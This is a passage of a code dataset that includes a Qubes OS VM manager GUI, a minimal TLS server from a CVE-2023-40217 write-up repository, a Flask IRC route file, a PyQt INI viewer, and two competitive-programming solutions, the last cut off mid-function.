self.get_vms_list()\n\n        vms_in_table = {}\n\n        row_no = 0\n        for vm in vms_list:\n            vm_row = VmRowInTable(vm, row_no, self.table)\n            vms_in_table[vm.qid] = vm_row\n\n            row_no += 1\n\n        self.table.setRowCount(row_no)\n        self.vms_list = vms_list\n        self.vms_in_table = vms_in_table\n        if selected_qid in vms_in_table.keys():\n            self.table.setCurrentItem(\n                self.vms_in_table[selected_qid].name_widget)\n        self.table.setSortingEnabled(True)\n\n        self.showhide_vms()\n\n    def showhide_vms(self):\n        if not self.search:\n            for row_no in range(self.table.rowCount()):\n                self.table.setRowHidden(row_no, False)\n        else:\n            for row_no in range(self.table.rowCount()):\n                widget = self.table.cellWidget(row_no,\n                                               self.columns_indices[\"State\"])\n                show = (self.search in widget.vm.name)\n                self.table.setRowHidden(row_no, not show)\n\n    @QtCore.pyqtSlot(str)\n    def do_search(self, search):\n        self.search = str(search)\n        self.showhide_vms()\n\n    # noinspection PyArgumentList\n    @QtCore.pyqtSlot(name='on_action_search_triggered')\n    def action_search_triggered(self):\n        self.searchbox.setFocus()\n\n    def update_table(self):\n\n        self.fill_table()\n        # TODO: instead of manually refreshing the entire table, use dbus events\n\n        # reapply sorting\n        if self.sort_by_column:\n            self.table.sortByColumn(self.columns_indices[self.sort_by_column])\n\n        self.table_selection_changed()\n\n    # noinspection PyPep8Naming\n    def sort_indicator_changed(self, column, 
order):\n self.sort_by_column = [name for name in self.columns_indices if\n self.columns_indices[name] == column][0]\n self.sort_order = order\n if self.settings_loaded:\n self.manager_settings.setValue('view/sort_column',\n self.sort_by_column)\n self.manager_settings.setValue('view/sort_order', self.sort_order)\n self.manager_settings.sync()\n\n def table_selection_changed(self):\n\n vm = self.get_selected_vm()\n\n if vm is not None and vm in self.qubes_app.domains:\n\n # TODO: add boot from device to menu and add windows tools there\n # Update available actions:\n self.action_settings.setEnabled(vm.klass != 'AdminVM')\n self.action_removevm.setEnabled(\n vm.klass != 'AdminVM' and not vm.is_running())\n self.action_clonevm.setEnabled(vm.klass != 'AdminVM')\n self.action_resumevm.setEnabled(\n not vm.is_running() or vm.get_power_state() == \"Paused\")\n self.action_pausevm.setEnabled(\n vm.is_running() and vm.get_power_state() != \"Paused\"\n and vm.klass != 'AdminVM')\n self.action_shutdownvm.setEnabled(\n vm.is_running() and vm.get_power_state() != \"Paused\"\n and vm.klass != 'AdminVM')\n self.action_restartvm.setEnabled(\n vm.is_running() and vm.get_power_state() != \"Paused\"\n and vm.klass != 'AdminVM'\n and (vm.klass != 'DispVM' or not vm.auto_cleanup))\n self.action_killvm.setEnabled(\n (vm.get_power_state() == \"Paused\" or vm.is_running())\n and vm.klass != 'AdminVM')\n\n self.action_appmenus.setEnabled(\n vm.klass != 'AdminVM' and vm.klass != 'DispVM'\n and not vm.features.get('internal', False))\n self.action_editfwrules.setEnabled(vm.klass != 'AdminVM')\n self.action_updatevm.setEnabled(getattr(vm, 'updateable', False)\n or vm.qid == 0)\n self.action_run_command_in_vm.setEnabled(\n not vm.get_power_state() == \"Paused\" and vm.qid != 0)\n self.action_set_keyboard_layout.setEnabled(\n vm.qid != 0 and\n vm.get_power_state() != \"Paused\" and vm.is_running())\n\n self.update_single_row(vm)\n else:\n self.action_settings.setEnabled(False)\n self.action_removevm.setEnabled(False)\n self.action_clonevm.setEnabled(False)\n self.action_resumevm.setEnabled(False)\n self.action_pausevm.setEnabled(False)\n self.action_shutdownvm.setEnabled(False)\n self.action_restartvm.setEnabled(False)\n self.action_killvm.setEnabled(False)\n self.action_appmenus.setEnabled(False)\n self.action_editfwrules.setEnabled(False)\n self.action_updatevm.setEnabled(False)\n self.action_run_command_in_vm.setEnabled(False)\n self.action_set_keyboard_layout.setEnabled(False)\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_createvm_triggered')\n def action_createvm_triggered(self): # pylint: disable=no-self-use\n subprocess.check_call('qubes-vm-create')\n\n def get_selected_vm(self):\n # vm selection relies on the VmInfo widget's value used\n # for sorting by VM name\n row_index = self.table.currentRow()\n if row_index != -1:\n vm_item = self.table.item(row_index, self.columns_indices[\"Name\"])\n # here is possible race with update_table timer so check\n # if really got the item\n if vm_item is None:\n return None\n qid = vm_item.qid\n assert self.vms_in_table[qid] is not None\n vm = self.vms_in_table[qid].vm\n return vm\n else:\n return None\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_removevm_triggered')\n def action_removevm_triggered(self):\n\n vm = self.get_selected_vm()\n\n if vm.klass == 'TemplateVM':\n dependent_vms = 0\n for single_vm in self.qubes_app.domains:\n if getattr(single_vm, 'template', None) == vm:\n dependent_vms += 1\n if dependent_vms > 0:\n 
QtGui.QMessageBox.warning(\n None, self.tr(\"Warning!\"),\n self.tr(\"This Template Qube cannot be removed, \"\n \"because there is at least one Qube that is based \"\n \"on it.<br><small>If you want to remove this \"\n \"Template Qube and all the Qubes based on it, you \"\n \"should first remove each individual Qube that \"\n \"uses this template.</small>\"))\n return\n\n (requested_name, ok) = QtGui.QInputDialog.getText(\n None, self.tr(\"Qube Removal Confirmation\"),\n self.tr(\"Are you sure you want to remove the Qube <b>'{0}'</b>\"\n \"?<br> All data on this Qube's private storage will be \"\n \"lost!<br><br>Type the name of the Qube (<b>{1}</b>) below \"\n \"to confirm:\").format(vm.name, vm.name))\n\n if not ok:\n # user clicked cancel\n return\n\n elif requested_name != vm.name:\n # name did not match\n QtGui.QMessageBox.warning(\n None,\n self.tr(\"Qube removal confirmation failed\"),\n self.tr(\n \"Entered name did not match! Not removing \"\n \"{0}.\").format(vm.name))\n return\n\n else:\n # remove the VM\n t_monitor = thread_monitor.ThreadMonitor()\n thread = threading.Thread(target=self.do_remove_vm,\n args=(vm, self.qubes_app, t_monitor))\n thread.daemon = True\n thread.start()\n\n progress = QtGui.QProgressDialog(\n self.tr(\n \"Removing Qube: <b>{0}</b>...\").format(vm.name), \"\", 0, 0)\n progress.setCancelButton(None)\n progress.setModal(True)\n progress.show()\n\n while not t_monitor.is_finished():\n self.qt_app.processEvents()\n time.sleep(0.1)\n\n progress.hide()\n\n if t_monitor.success:\n pass\n else:\n QtGui.QMessageBox.warning(None, self.tr(\"Error removing Qube!\"),\n self.tr(\"ERROR: {0}\").format(\n t_monitor.error_msg))\n\n self.update_table()\n\n @staticmethod\n def do_remove_vm(vm, qubes_app, t_monitor):\n try:\n del qubes_app.domains[vm.name]\n except exc.QubesException as ex:\n t_monitor.set_error_msg(str(ex))\n\n t_monitor.set_finished()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_clonevm_triggered')\n def action_clonevm_triggered(self):\n vm = self.get_selected_vm()\n\n name_number = 1\n name_format = vm.name + '-clone-%d'\n while name_format % name_number in self.qubes_app.domains.keys():\n name_number += 1\n\n (clone_name, ok) = QtGui.QInputDialog.getText(\n self, self.tr('Qubes clone Qube'),\n self.tr('Enter name for Qube <b>{}</b> clone:').format(vm.name),\n text=(name_format % name_number))\n if not ok or clone_name == \"\":\n return\n\n t_monitor = thread_monitor.ThreadMonitor()\n thread = threading.Thread(target=self.do_clone_vm,\n args=(vm, self.qubes_app,\n clone_name, t_monitor))\n thread.daemon = True\n thread.start()\n\n progress = QtGui.QProgressDialog(\n self.tr(\"Cloning Qube <b>{0}</b> to <b>{1}</b>...\").format(\n vm.name, clone_name), \"\", 0, 0)\n progress.setCancelButton(None)\n progress.setModal(True)\n progress.show()\n\n while not t_monitor.is_finished():\n self.qt_app.processEvents()\n time.sleep(0.2)\n\n progress.hide()\n\n if not t_monitor.success:\n QtGui.QMessageBox.warning(\n None,\n self.tr(\"Error while cloning Qube\"),\n self.tr(\"Exception while cloning:<br>{0}\").format(\n t_monitor.error_msg))\n\n self.update_table()\n\n @staticmethod\n def do_clone_vm(src_vm, qubes_app, dst_name, t_monitor):\n dst_vm = None\n try:\n dst_vm = qubes_app.clone_vm(src_vm, dst_name)\n except exc.QubesException as ex:\n t_monitor.set_error_msg(str(ex))\n if dst_vm:\n pass\n t_monitor.set_finished()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_resumevm_triggered')\n def 
action_resumevm_triggered(self):\n vm = self.get_selected_vm()\n\n if vm.get_power_state() in [\"Paused\", \"Suspended\"]:\n try:\n vm.unpause()\n except exc.QubesException as ex:\n QtGui.QMessageBox.warning(\n None, self.tr(\"Error unpausing Qube!\"),\n self.tr(\"ERROR: {0}\").format(ex))\n return\n\n self.start_vm(vm)\n self.update_single_row(vm)\n\n def start_vm(self, vm):\n if vm.is_running():\n return\n t_monitor = thread_monitor.ThreadMonitor()\n thread = threading.Thread(target=self.do_start_vm,\n args=(vm, t_monitor))\n thread.daemon = True\n thread.start()\n\n while not t_monitor.is_finished():\n self.qt_app.processEvents()\n time.sleep(0.1)\n\n if not t_monitor.success:\n QtGui.QMessageBox.warning(\n None,\n self.tr(\"Error starting Qube!\"),\n self.tr(\"ERROR: {0}\").format(t_monitor.error_msg))\n\n self.update_single_row(vm)\n\n @staticmethod\n def do_start_vm(vm, t_monitor):\n try:\n vm.start()\n except exc.QubesException as ex:\n t_monitor.set_error_msg(str(ex))\n t_monitor.set_finished()\n return\n\n t_monitor.set_finished()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_startvm_tools_install_triggered')\n # TODO: replace with boot from device\n def action_startvm_tools_install_triggered(self):\n # pylint: disable=invalid-name\n pass\n\n @QtCore.pyqtSlot(name='on_action_pausevm_triggered')\n def action_pausevm_triggered(self):\n vm = self.get_selected_vm()\n assert vm.is_running()\n try:\n vm.pause()\n self.update_single_row(vm)\n except exc.QubesException as ex:\n QtGui.QMessageBox.warning(\n None,\n self.tr(\"Error pausing Qube!\"),\n self.tr(\"ERROR: {0}\").format(ex))\n return\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_shutdownvm_triggered')\n def action_shutdownvm_triggered(self):\n vm = self.get_selected_vm()\n assert vm.is_running()\n\n reply = QtGui.QMessageBox.question(\n None, self.tr(\"Qube Shutdown Confirmation\"),\n self.tr(\"Are you sure you want to power down the Qube\"\n \" <b>'{0}'</b>?<br><small>This will shutdown all the \"\n \"running applications within this Qube.</small>\").format(\n vm.name), QtGui.QMessageBox.Yes | QtGui.QMessageBox.Cancel)\n\n self.qt_app.processEvents()\n\n if reply == QtGui.QMessageBox.Yes:\n self.shutdown_vm(vm)\n\n self.update_single_row(vm)\n\n def shutdown_vm(self, vm, shutdown_time=vm_shutdown_timeout,\n check_time=vm_restart_check_timeout, and_restart=False):\n try:\n vm.shutdown()\n except exc.QubesException as ex:\n QtGui.QMessageBox.warning(\n None,\n self.tr(\"Error shutting down Qube!\"),\n self.tr(\"ERROR: {0}\").format(ex))\n return\n\n self.shutdown_monitor[vm.qid] = VmShutdownMonitor(vm, shutdown_time,\n check_time,\n and_restart, self)\n # noinspection PyCallByClass,PyTypeChecker\n QtCore.QTimer.singleShot(check_time, self.shutdown_monitor[\n vm.qid].check_if_vm_has_shutdown)\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_restartvm_triggered')\n def action_restartvm_triggered(self):\n vm = self.get_selected_vm()\n assert vm.is_running()\n\n reply = QtGui.QMessageBox.question(\n None, self.tr(\"Qube Restart Confirmation\"),\n self.tr(\"Are you sure you want to restart the Qube <b>'{0}'</b>?\"\n \"<br><small>This will shutdown all the running \"\n \"applications within this Qube.</small>\").format(vm.name),\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.Cancel)\n\n self.qt_app.processEvents()\n\n if reply == QtGui.QMessageBox.Yes:\n self.shutdown_vm(vm, and_restart=True)\n\n self.update_single_row(vm)\n\n # noinspection PyArgumentList\n 
@QtCore.pyqtSlot(name='on_action_killvm_triggered')\n    def action_killvm_triggered(self):\n        vm = self.get_selected_vm()\n        assert vm.is_running() or vm.is_paused()\n\n        reply = QtGui.QMessageBox.question(\n            None, self.tr(\"Qube Kill Confirmation\"),\n            self.tr(\"Are you sure you want to kill the Qube <b>'{0}'</b>?<br>\"\n                    \"<small>This will end <b>(not shutdown!)</b> all the \"\n                    \"running applications within this Qube.</small>\").format(\n                vm.name),\n            QtGui.QMessageBox.Yes | QtGui.QMessageBox.Cancel,\n            QtGui.QMessageBox.Cancel)\n\n        self.qt_app.processEvents()\n\n        if reply == QtGui.QMessageBox.Yes:\n            try:\n                vm.kill()\n            except exc.QubesException as ex:\n                QtGui.QMessageBox.critical(\n                    None, self.tr(\"Error while killing Qube!\"),\n                    self.tr(\n                        \"<b>An exception occurred while killing {0}.</b><br>\"\n                        \"ERROR: {1}\").format(vm.name, ex))\n                return\n\n    # noinspection PyArgumentList\n    @QtCore.pyqtSlot(name='on_action_settings_triggered')\n    def action_settings_triggered(self):\n        vm = self.get_selected_vm()\n        if vm:\n            settings_window = settings.VMSettingsWindow(\n                vm, self.qt_app, \"basic\")\n            settings_window.exec_()\n            self.update_single_row(vm)\n\n    # noinspection PyArgumentList\n    @QtCore.pyqtSlot(name='on_action_appmenus_triggered')\n    def action_appmenus_triggered(self):\n        vm = self.get_selected_vm()\n        if vm:\n            settings_window = settings.VMSettingsWindow(\n                vm, self.qt_app, \"applications\")\n            settings_window.exec_()\n\n    # noinspection PyArgumentList\n    @QtCore.pyqtSlot(name='on_action_refresh_list_triggered')\n    def action_refresh_list_triggered(self):\n        self.qubes_app.domains.clear_cache()\n        self.update_table()\n\n    # noinspection PyArgumentList\n    @QtCore.pyqtSlot(name='on_action_updatevm_triggered')\n    def action_updatevm_triggered(self):\n        vm = self.get_selected_vm()\n\n        if not vm.is_running():\n            reply = QtGui.QMessageBox.question(\n                None, self.tr(\"Qube Update Confirmation\"),\n                self.tr(\n                    \"<b>{0}</b><br>The Qube has to be running to be updated.\"\n                    \"<br>Do you want to start it?<br>\").format(vm.name),\n                QtGui.QMessageBox.Yes | QtGui.QMessageBox.Cancel)\n            if reply != QtGui.QMessageBox.Yes:\n                return\n\n        self.qt_app.processEvents()\n\n        t_monitor = thread_monitor.ThreadMonitor()\n        thread = threading.Thread(target=self.do_update_vm,\n                                   args=(vm, t_monitor))\n        thread.daemon = True\n        thread.start()\n\n        progress = QtGui.QProgressDialog(\n            self.tr(\n                \"<b>{0}</b><br>Please wait for the updater to \"\n                \"launch...\").format(vm.name), \"\", 0, 0)\n        progress.setCancelButton(None)\n        progress.setModal(True)\n        progress.show()\n\n        while not t_monitor.is_finished():\n            self.qt_app.processEvents()\n            time.sleep(0.2)\n\n        progress.hide()\n\n        if vm.qid != 0:\n            if not t_monitor.success:\n                QtGui.QMessageBox.warning(\n                    None,\n                    self.tr(\"Error on Qube update!\"),\n                    self.tr(\"ERROR: {0}\").format(t_monitor.error_msg))\n\n        self.update_single_row(vm)\n\n    @staticmethod\n    def do_update_vm(vm, t_monitor):\n        try:\n            if vm.qid == 0:\n                subprocess.check_call(\n                    [\"/usr/bin/qubes-dom0-update\", \"--clean\", \"--gui\"])\n            else:\n                if not vm.is_running():\n                    vm.start()\n                vm.run_service(\"qubes.InstallUpdatesGUI\",\n                               user=\"root\", wait=False)\n        except (ChildProcessError, exc.QubesException) as ex:\n            t_monitor.set_error_msg(str(ex))\n            t_monitor.set_finished()\n            return\n        t_monitor.set_finished()\n\n    # noinspection PyArgumentList\n    @QtCore.pyqtSlot(name='on_action_run_command_in_vm_triggered')\n    def action_run_command_in_vm_triggered(self):\n        # pylint: disable=invalid-name\n        vm = self.get_selected_vm()\n\n        (command_to_run, ok) = 
QtGui.QInputDialog.getText(\n self, self.tr('Qubes command entry'),\n self.tr('Run command in <b>{}</b>:').format(vm.name))\n if not ok or command_to_run == \"\":\n return\n t_monitor = thread_monitor.ThreadMonitor()\n thread = threading.Thread(target=self.do_run_command_in_vm, args=(\n vm, command_to_run, t_monitor))\n thread.daemon = True\n thread.start()\n\n while not t_monitor.is_finished():\n self.qt_app.processEvents()\n time.sleep(0.2)\n\n if not t_monitor.success:\n QtGui.QMessageBox.warning(\n None, self.tr(\"Error while running command\"),\n self.tr(\"Exception while running command:<br>{0}\").format(\n t_monitor.error_msg))\n\n @staticmethod\n def do_run_command_in_vm(vm, command_to_run, t_monitor):\n try:\n vm.run(command_to_run)\n except (ChildProcessError, exc.QubesException) as ex:\n t_monitor.set_error_msg(str(ex))\n t_monitor.set_finished()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_set_keyboard_layout_triggered')\n def action_set_keyboard_layout_triggered(self):\n # pylint: disable=invalid-name\n vm = self.get_selected_vm()\n vm.run('qubes-change-keyboard-layout')\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_editfwrules_triggered')\n def action_editfwrules_triggered(self):\n vm = self.get_selected_vm()\n settings_window = settings.VMSettingsWindow(vm, self.qt_app, \"firewall\")\n settings_window.exec_()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_global_settings_triggered')\n def action_global_settings_triggered(self): # pylint: disable=invalid-name\n global_settings_window = global_settings.GlobalSettingsWindow(\n self.qt_app,\n self.qubes_app)\n global_settings_window.exec_()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_show_network_triggered')\n def action_show_network_triggered(self):\n pass\n # TODO: revive for 4.1\n # network_notes_dialog = NetworkNotesDialog()\n # network_notes_dialog.exec_()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_restore_triggered')\n def action_restore_triggered(self):\n restore_window = restore.RestoreVMsWindow(self.qt_app, self.qubes_app)\n restore_window.exec_()\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_backup_triggered')\n def action_backup_triggered(self):\n backup_window = backup.BackupVMsWindow(self.qt_app, self.qubes_app)\n backup_window.exec_()\n\n def showhide_menubar(self, checked):\n self.menubar.setVisible(checked)\n if not checked:\n self.context_menu.addAction(self.action_menubar)\n else:\n self.context_menu.removeAction(self.action_menubar)\n if self.settings_loaded:\n self.manager_settings.setValue('view/menubar_visible', checked)\n self.manager_settings.sync()\n\n def showhide_toolbar(self, checked):\n self.toolbar.setVisible(checked)\n if not checked:\n self.context_menu.addAction(self.action_toolbar)\n else:\n self.context_menu.removeAction(self.action_toolbar)\n if self.settings_loaded:\n self.manager_settings.setValue('view/toolbar_visible', checked)\n self.manager_settings.sync()\n\n def showhide_column(self, col_num, show):\n self.table.setColumnHidden(col_num, not show)\n\n val = 1 if show else -1\n self.visible_columns_count += val\n\n if self.visible_columns_count == 1:\n # disable hiding the last one\n for col in self.columns_actions:\n if self.columns_actions[col].isChecked():\n self.columns_actions[col].setEnabled(False)\n break\n elif self.visible_columns_count == 2 and val == 1:\n # enable hiding previously disabled column\n for col in self.columns_actions:\n if 
not self.columns_actions[col].isEnabled():\n self.columns_actions[col].setEnabled(True)\n break\n\n if self.settings_loaded:\n col_name = [name for name in self.columns_indices if\n self.columns_indices[name] == col_num][0]\n self.manager_settings.setValue('columns/%s' % col_name, show)\n self.manager_settings.sync()\n\n def on_action_vm_type_toggled(self, checked):\n self.showhide_column(self.columns_indices['Type'], checked)\n\n def on_action_label_toggled(self, checked):\n self.showhide_column(self.columns_indices['Label'], checked)\n\n def on_action_name_toggled(self, checked):\n self.showhide_column(self.columns_indices['Name'], checked)\n\n def on_action_state_toggled(self, checked):\n self.showhide_column(self.columns_indices['State'], checked)\n\n def on_action_internal_toggled(self, checked):\n self.showhide_column(self.columns_indices['Internal'], checked)\n\n def on_action_ip_toggled(self, checked):\n self.showhide_column(self.columns_indices['IP'], checked)\n\n def on_action_backups_toggled(self, checked):\n self.showhide_column(self.columns_indices['Backups'], checked)\n\n def on_action_last_backup_toggled(self, checked):\n self.showhide_column(self.columns_indices['Last backup'], checked)\n\n def on_action_template_toggled(self, checked):\n self.showhide_column(self.columns_indices['Template'], checked)\n\n def on_action_netvm_toggled(self, checked):\n self.showhide_column(self.columns_indices['NetVM'], checked)\n\n def on_action_size_on_disk_toggled(self, checked):\n self.showhide_column(self.columns_indices['Size'], checked)\n\n # noinspection PyArgumentList\n @QtCore.pyqtSlot(name='on_action_about_qubes_triggered')\n def action_about_qubes_triggered(self): # pylint: disable=no-self-use\n about = AboutDialog()\n about.exec_()\n\n def createPopupMenu(self): # pylint: disable=invalid-name\n menu = QtGui.QMenu()\n menu.addAction(self.action_toolbar)\n menu.addAction(self.action_menubar)\n return menu\n\n def open_tools_context_menu(self, widget, point):\n self.tools_context_menu.exec_(widget.mapToGlobal(point))\n\n @QtCore.pyqtSlot('const QPoint&')\n def open_context_menu(self, point):\n vm = self.get_selected_vm()\n\n # logs menu\n self.logs_menu.clear()\n\n if vm.qid == 0:\n logfiles = [\"/var/log/xen/console/hypervisor.log\"]\n else:\n logfiles = [\n \"/var/log/xen/console/guest-\" + vm.name + \".log\",\n \"/var/log/xen/console/guest-\" + vm.name + \"-dm.log\",\n \"/var/log/qubes/guid.\" + vm.name + \".log\",\n \"/var/log/qubes/qrexec.\" + vm.name + \".log\",\n ]\n\n menu_empty = True\n for logfile in logfiles:\n if os.path.exists(logfile):\n action = self.logs_menu.addAction(QtGui.QIcon(\":/log.png\"),\n logfile)\n action.setData(logfile)\n menu_empty = False\n\n self.logs_menu.setEnabled(not menu_empty)\n self.context_menu.exec_(self.table.mapToGlobal(point))\n\n @QtCore.pyqtSlot('QAction *')\n def show_log(self, action):\n log = str(action.data())\n log_dlg = log_dialog.LogDialog(self.qt_app, log)\n log_dlg.exec_()\n\n\n# Bases on the original code by:\n# Copyright (c) 2002-2007 Pascal Varet <p.varet@gmail.com>\n\ndef handle_exception(exc_type, exc_value, exc_traceback):\n\n filename, line, dummy, dummy = traceback.extract_tb(exc_traceback).pop()\n filename = os.path.basename(filename)\n error = \"%s: %s\" % (exc_type.__name__, exc_value)\n\n strace = \"\"\n stacktrace = traceback.extract_tb(exc_traceback)\n while stacktrace:\n (filename, line, func, txt) = stacktrace.pop()\n strace += \"----\\n\"\n strace += \"line: %s\\n\" % txt\n strace += \"func: %s\\n\" % func\n 
strace += \"line no.: %d\\n\" % line\n strace += \"file: %s\\n\" % filename\n\n msg_box = QtGui.QMessageBox()\n msg_box.setDetailedText(strace)\n msg_box.setIcon(QtGui.QMessageBox.Critical)\n msg_box.setWindowTitle(\"Houston, we have a problem...\")\n msg_box.setText(\"Whoops. A critical error has occured. \"\n \"This is most likely a bug in Qubes Manager.<br><br>\"\n \"<b><i>%s</i></b>\" % error +\n \"<br/>at line <b>%d</b><br/>of file %s.<br/><br/>\"\n % (line, filename))\n\n msg_box.exec_()\n\n\ndef main():\n qt_app = QtGui.QApplication(sys.argv)\n qt_app.setOrganizationName(\"The Qubes Project\")\n qt_app.setOrganizationDomain(\"http://qubes-os.org\")\n qt_app.setApplicationName(\"Qube Manager\")\n qt_app.setWindowIcon(QtGui.QIcon.fromTheme(\"qubes-manager\"))\n\n sys.excepthook = handle_exception\n\n qubes_app = Qubes()\n\n manager_window = VmManagerWindow(qubes_app, qt_app)\n\n manager_window.show()\n manager_window.update_table()\n qt_app.exec_()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"trgr/qubes-manager","sub_path":"qubesmanager/qube_manager.py","file_name":"qube_manager.py","file_ext":"py","file_size_in_byte":44550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"15297577657","text":"import socket\nimport ssl\n\n# Listen for TCP connections\nlistener = socket.socket()\nlistener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nlistener.bind((\"127.0.0.1\", 12345))\nlistener.listen(5)\nconn, address = listener.accept()\n\n# Create a TLS context that checks the client certificate\nctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)\nctx.verify_mode = ssl.CERT_REQUIRED\nctx.load_verify_locations(cafile=\"server.crt\")\nctx.load_cert_chain(certfile=\"server.crt\", keyfile=\"server.key\")\n\n# Wrap the TCP connection with TLS\ntls_socket = ctx.wrap_socket(conn, server_side=True)\n\n# Receive data from the authenticated and secure TLS connection\nprint(tls_socket.recv(4096))\n","repo_name":"aapooksman/writeups","sub_path":"CVE-2023-40217/python-ssl-server-victim.py","file_name":"python-ssl-server-victim.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"37209475598","text":"from flask import Blueprint, request, jsonify\nfrom redis_client import redis_client\n\n\nirc = Blueprint('irc', __name__)\n\n\n@irc.route('/part/<channel>', methods=['GET'])\ndef part(channel):\n redis_client.hset('channels', channel, 0)\n return f'LEFT {channel}'\n\n\n@irc.route('/channels', methods=['GET'])\ndef channels():\n print(\"REDIS - Channels\")\n print(redis_client.hgetall('channels'))\n return ''\n\n\n@irc.route('/deleteall')\ndef delete_all():\n redis_client.flushdb()\n return redis_client.hgetall('channels')\n\n\n@irc.route('/shutdown')\ndef shutdown():\n redis_client.delete('channels')\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n return jsonify({})\n","repo_name":"chasezimmy/irc-reader","sub_path":"irc/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"8631709148","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport configparser\nfrom PyQt5 import (QtCore as qtc, QtWidgets as qtw)\nfrom PyQt5.QtCore import Qt\n\n\nclass TableModel(qtc.QAbstractTableModel):\n def 
__init__(self, data):\n super(TableModel, self).__init__()\n self._data = data\n self.sections = data.sections()\n\n self.selected_section = self.sections[0]\n self.loadData()\n\n def loadData(self):\n\n self.selected_data = [(key, value) for key, value in\n self._data[self.selected_section].items()]\n\n self.collen = 2\n self.rowlen = len(self._data[self.selected_section])\n\n def data(self, index, role):\n if role == Qt.DisplayRole:\n # .row() indexes into the outer list,\n # .column() indexes into the (key, value) tuples\n return self.selected_data[index.row()][index.column()]\n\n def rowCount(self, index):\n # The length of the outer list.\n return len(self.selected_data)\n\n def columnCount(self, index):\n # The following takes the first sub-list, and returns\n # the length (only works if all rows are an equal length)\n return len(self.selected_data[0])\n\n\nclass IniTable(qtw.QTableView):\n\n def __init__(self, data, *args, **kwargs):\n super(IniTable, self).__init__(*args, **kwargs)\n self.model = TableModel(data)\n self.setModel(self.model)\n self.horizontalHeader().setSectionResizeMode(qtw.QHeaderView.Stretch)\n\n\nclass IniView(qtw.QWidget):\n\n def __init__(self, data, *args, **kwargs):\n super(IniView, self).__init__(*args, **kwargs)\n\n self._data = data\n\n self.table = IniTable(data)\n\n self.list = qtw.QListWidget()\n self.list.addItems(self._data.sections())\n self.list.itemSelectionChanged.connect(self.updateSection)\n\n self.lay = qtw.QGridLayout()\n\n self.lay.addWidget(self.list, 0, 0)\n self.lay.addWidget(self.table, 0, 1)\n\n self.setLayout(self.lay)\n\n def updateSection(self):\n self.table.model.selected_section = self.list.currentItem().text()\n self.table.model.loadData()\n self.table.model.dataChanged.emit(qtc.QModelIndex, qtc.QModelIndex)\n\n\nif __name__ == '__main__':\n\n app = qtw.QApplication(sys.argv)\n current_file = qtw.QFileDialog.getOpenFileName()\n config = configparser.ConfigParser()\n config.read(current_file)\n window = IniView(config)\n window.show()\n app.exec_()\n","repo_name":"IjonTichiy/iniEditor","sub_path":"iniView.py","file_name":"iniView.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27566086529","text":"import fractions\nn, m = map(int, input().split())\na = [i//2 for i in list(map(int, input().split()))]\ntmp = a[0]\ncount = 0\nwhile tmp % 2 == 0:\n tmp /= 2\n count += 1\nfor i in range(n):\n tmp = a[i]\n div = 0\n while tmp % 2 == 0:\n tmp /= 2\n div += 1\n if div != count:\n print(0)\n exit()\nans = 0\nk = a[0]\nfor i in range(n):\n k = (k * a[i]) // (fractions.gcd(k, a[i]))\nans = m // k\nans = (ans + 1) // 2\nprint(ans)","repo_name":"Yuta123456/AtCoder","sub_path":"python/AtCoder Beginner Contest 150/Semi Common Multiple.py","file_name":"Semi Common Multiple.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24777861177","text":"class Solution:\n def merge(self, nums1, m, nums2, n) -> None:\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n\n leftIndex = m-1\n rightIndex = n-1\n curIndex = m+n - 1\n\n while curIndex > -1:\n\n if leftIndex < 0:\n\n nums1[curIndex] = nums2[rightIndex]\n rightIndex -= 1\n curIndex -= 1\n elif rightIndex < 0:\n nums1[curIndex] = nums1[leftIndex]\n leftIndex -= 1\n curIndex -= 1\n elif nums1[leftIndex] >= nums2[rightIndex]:\n nums1[curIndex] = nums1[leftIndex]\n 
